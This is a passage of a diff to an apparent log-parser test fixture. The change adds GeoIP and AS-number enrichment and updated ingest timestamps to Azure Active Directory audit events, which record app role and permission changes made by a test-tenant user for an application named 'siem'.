APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -3191,6 +3395,18 @@
 },
 {
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.15"
 },
 "tags": [
@@ -3357,7 +3573,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124932400Z", + "ingested": "2021-12-14T14:48:43.176646557Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -3384,6 +3600,18 @@
 },
 {
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.15"
 },
 "tags": [
@@ -3528,7 +3756,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124939Z", + "ingested": "2021-12-14T14:48:43.176647289Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -3555,6 +3783,18 @@
 },
 {
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.15"
 },
 "tags": [
@@ -3699,7 +3939,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124945600Z", + "ingested": "2021-12-14T14:48:43.176647980Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -3726,6 +3966,18 @@
 },
 {
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.15"
 },
 "tags": [
@@ -3879,7 +4131,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124949900Z", + "ingested": "2021-12-14T14:48:43.176648645Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosof